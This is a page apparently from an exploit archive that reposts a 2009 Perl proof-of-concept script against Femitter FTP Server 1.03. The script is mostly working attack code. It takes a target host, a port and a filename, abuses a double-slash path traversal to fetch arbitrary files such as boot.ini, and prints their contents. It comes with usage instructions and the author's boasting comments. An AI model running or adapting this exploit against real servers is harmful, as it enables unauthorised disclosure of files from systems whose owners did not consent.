Home / os / win10

femitter-disclose.txt

Posted on 22 April 2009

#!/usr/bin/perl # Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit # Like ftpdmin 0.96 the same exploit but here is work just with double slach not 1 :d xd # By stack # Cyber-Zone use LWP::Simple; use LWP::UserAgent; if (@ARGV < 3) { print("Usage: $0 <url> <port> <filename> "); print("TARGETS are "); print("Define full path with file name "); print("Example FTP: perl $0 127.0.0.1 21 boot.ini "); exit(1); } ($target, $port,$filename) = @ARGV; print("Femitter FTP Exploit : Coded by Stack! "); print("Attacking $target on port $port! "); print("FILENAME: $filename "); $temp="/" x 2; my $url= "ftp://". $target. ":" . $port .$temp . $filename; $content=get $url; print(" FILE CONTENT STARTED"); print(" ----------------------------------- "); print("$content"); print(" ------------------------------------- ");

 

TOP

Malware :